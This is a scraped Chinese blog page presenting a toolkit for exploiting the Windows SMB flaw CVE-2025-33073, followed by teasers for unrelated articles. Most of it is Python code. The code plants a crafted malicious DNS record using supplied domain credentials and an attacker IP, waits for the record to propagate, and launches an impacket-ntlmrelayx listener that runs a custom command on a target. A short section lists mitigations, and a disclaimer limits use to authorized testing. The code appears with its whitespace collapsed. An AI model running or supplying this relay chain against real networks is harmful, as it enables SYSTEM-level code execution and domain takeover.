news 2026/5/19 11:51:15

Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

项目描述

该项目是一个针对Windows SMB客户端远程代码执行漏洞CVE-2025-33073的安全研究与渗透测试工具集。该漏洞被标记为高危(CVSS 8.8分),影响Windows 10、11及Server 2012-2025的所有版本,允许攻击者在经过身份验证的情况下通过网络实现SYSTEM级别的远程代码执行。工具集包含DNS记录操作和NTLM中继攻击功能,用于模拟和测试相关攻击场景。

功能特性

  • DNS记录操作:通过dnstool.py工具添加恶意DNS记录,支持ADIDNS over LDAP交互
  • NTLM中继攻击:利用impacket-ntlmrelayx工具发起SMB中继攻击,支持自定义命令执行
  • DNS传播监控:自动检测DNS记录是否已成功传播,支持超时控制
  • 多终端支持:可在当前终端或新xterm窗口中启动监听器
  • Kerberos集成:支持Kerberos身份验证,可与LDAP服务交互
  • 漏洞利用辅助:专门针对CVE-2025-33073漏洞的利用环境搭建

安装指南

系统要求

  • Python 3.x
  • impacket库
  • ldap3库
  • dnspython库
  • xterm(如需在新窗口中启动监听器)

依赖安装

pipinstallimpacket ldap3 dnspython

在Linux/macOS上安装

# 克隆相关工具gitclone<repository-url>cd<project-directory># 确保脚本有执行权限chmod+x *.py# 安装系统依赖(Debian/Ubuntu)sudoapt-getinstallxtermdig

使用说明

基础使用示例

#!/usr/bin/env python3importshleximportsysimportargparseimportsubprocessimporttime# 静态DNS记录常量STATIC_DNS_RECORD="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"defrun_dnstool(user,password,attacker_ip,dns_ip,dc_fqdn):""" 使用dnstool.py添加恶意DNS记录 """print("[*] Adding malicious DNS record using dnstool.py...")dnstool_cmd=["python3","dnstool.py","-u",user,"-p",password,"-a","add","-r",STATIC_DNS_RECORD,"-d",attacker_ip,"-dns-ip",dns_ip,dc_fqdn]subprocess.run(dnstool_cmd,check=True)print("[+] DNS record added.")

监控DNS记录传播

defwait_for_dns_record(record,dns_ip,timeout=60):""" 等待DNS记录传播并验证 """timeout=int(timeout)print(f"[*] Waiting for DNS record{record}to propagate...")start_time=time.time()whiletime.time()-start_time<timeout:try:result=subprocess.run(["dig","+short",record,f"@{dns_ip}"],capture_output=True,text=True)ifresult.stdout.strip():print("[+] DNS record is live.")returnTrueexceptExceptionase:print(f"[!] Error checking DNS record:{e}")time.sleep(2)print("[!] Timeout reached. DNS record not found.")returnFalse

启动NTLM中继监听器

defstart_ntlmrelayx(target,cli_only=False,custom_command=None,socks=False):""" 启动impacket-ntlmrelayx监听器 """ifcli_only:print("[*] Starting ntlmrelayx listener in this terminal...")ifcustom_command:cmd=["impacket-ntlmrelayx","-t",target,"-smb2support","-c",custom_command]else:cmd=["impacket-ntlmrelayx","-t",target,"-smb2support"]ifsocks:cmd.append("-socks")returnsubprocess.Popen(cmd)else:print("[*] Starting ntlmrelayx listener in a new xterm...")ifcustom_command:cmd=["xterm","-hold","-e","impacket-ntlmrelayx","-t",target,"-smb2support","-c",custom_command]else:cmd=["xterm","-hold","-e","impacket-ntlmrelayx","-t",target,"-smb2support"]ifsocks:cmd.insert(-1,"-socks")returnsubprocess.Popen(cmd)

核心代码

DNS工具核心功能

#!/usr/bin/env python""" ADIDNS over LDAP交互工具 Copyright (c) 2019 Dirk-jan Mollema (@_dirkjan) """importsysimportargparseimportgetpassimportreimportosimportsocketfromstructimportunpack,packfromimpacket.structureimportStructurefromimpacket.krb5.ccacheimportCCachefromimpacket.krb5.kerberosv5importgetKerberosTGT,getKerberosTGSfromimpacket.krb5.typesimportPrincipalfromimpacket.krb5importconstantsfromldap3importNTLM,Server,Connection,ALL,LEVEL,BASE,MODIFY_DELETE,MODIFY_ADD,MODIFY_REPLACE,SASL,KERBEROSfromlib.utils.kerberosimportldap_kerberosimportldap3fromimpacket.ldapimportldaptypesimportdns.resolverimportdatetimedefprint_m(string):"""打印消息"""sys.stderr.write('\033[94m[-]\033[0m %s\n'%(string))defprint_o(string):"""打印成功信息"""sys.stderr.write('\033[92m[+]\033[0m %s\n'%(string))defprint_f(string):"""打印失败信息"""sys.stderr.write('\033[91m[!]\033[0m %s\n'%(string))

漏洞信息结构

# ✨ CVE-2025-33073: Windows SMB RCE Vulnerability 🚨# 🔥 High-Severity Authenticated Remote Code Execution 🔥# Improper Access Control in Windows SMB Client (CWE-284)# 🛡️ 关键信息概览""" CVSS v3.1评分: 8.8 (高危) 受影响系统: Windows 10, 11, Server 2012–2025 (所有版本) 披露日期: 2025年6月10日 (已在2025年6月补丁星期二修复) 攻击向量: 网络 (需身份验证) 影响: SYSTEM级别代码执行,通过Kerberos中继进行横向移动 绕过: NTLM反射缓解措施 """# 🛠️ 立即缓解措施""" 1. 立即打补丁! → 应用Microsoft更新 (例如 KB5060998) → Microsoft更新指南: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073 2. 启用SMB签名 → 在所有客户端和服务器上强制执行 → 使用命令: Set-SmbClientConfiguration -RequireSecuritySignature $true 3. 限制NTLM使用 → 尽可能阻止NTLM → 使用EDR工具监控中继尝试 4. 为什么这个漏洞重要? - 绕过传统的NTLM保护 - 即使在SMB签名未强制执行的情况下也能工作 - 在配置不当的AD环境中实现完整的域接管 """

该工具集专门设计用于安全研究人员和渗透测试人员,以了解和防御CVE-2025-33073漏洞的相关攻击。请仅在授权测试环境中使用这些工具。FINISHED
6HFtX5dABrKlqXeO5PUv/84SoIo+TE3firf/5vX8AZ5IUcd+bvYYh2w++QDLvscF
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/13 5:55:32

基于YOLOv5/v8/v10的手势识别系统:从理论到全栈实践

摘要 手势识别作为人机交互的重要方式&#xff0c;在虚拟现实、智能家居、无障碍通信等领域具有广泛应用价值。本文系统介绍了基于YOLO系列目标检测算法的手势识别完整解决方案&#xff0c;涵盖YOLOv5、YOLOv8和YOLOv10三个版本的核心技术对比&#xff0c;提供了完整的训练数据…

作者头像 李华
网站建设 2026/5/17 5:13:23

好写作AI:交叉学科“翻译官”,终结你的“学术巴别塔”困境!

各位在多个学科夹缝中“反复横跳”、左手生物学术语右手代码参数的交叉学科卷王们&#xff0c;是否经常这样&#xff1a;脑中的idea融合了A学科的深邃理论与B学科的犀利方法&#xff0c;感觉自己站在创新的潮头&#xff0c;一下笔却发现——“我写的这段话&#xff0c;两边领域…

作者头像 李华
网站建设 2026/5/17 5:29:06

基于Python 图形学实验(生成中间帧)

图形学实验: 生成中间帧 给定初始图片和结束图片&#xff0c;生成中间的N帧&#xff0c;使得首尾自然过渡 开发环境 开发环境&#xff1a;macOS Mojave 10.14.6开发软件&#xff1a;PyCharm 2019.1.3开发语言&#xff1a;python 如何运行 将项目文件夹拷贝到本地环境运行s…

作者头像 李华
网站建设 2026/5/16 15:55:10

从理论到实践:Node-RED性能优化的完整案例解析

在物联网和自动化领域&#xff0c;Node-RED以其直观的可视化编程界面赢得了众多开发者的青睐。然而&#xff0c;许多用户在实际应用中都会遇到一个共同的问题&#xff1a;为什么我的Node-RED流程看起来逻辑清晰&#xff0c;运行起来却异常缓慢&#xff1f; 为什么你的Node-RED…

作者头像 李华
网站建设 2026/5/11 14:08:28

亲测好用10个降AIGC工具 千笔AI帮你高效降AI率

AI降重工具的崛起与实用价值 在当前学术写作日益依赖AI生成内容的背景下&#xff0c;越来越多的学生和研究者开始关注如何有效降低AIGC率、去除AI痕迹&#xff0c;同时保持文章的逻辑性和语义通顺。这不仅关乎论文通过查重系统的标准&#xff0c;更直接影响到学术诚信和论文质…

作者头像 李华
网站建设 2026/5/15 11:09:28

基于深度学习YOLOv10的辣椒叶片病害检测系统(YOLOv10+YOLO数据集+UI界面+Python项目源码+模型)

一、项目介绍 项目摘要 本项目基于YOLOv10目标检测算法&#xff0c;开发了一个针对辣椒叶片病害的智能检测系统。系统能够自动识别并分类5种常见的辣椒叶片状态&#xff0c;包括健康叶片和4种病害类型&#xff08;黄单胞菌病、花叶病、尾孢菌病和卷叶病&#xff09;。通过深度…

作者头像 李华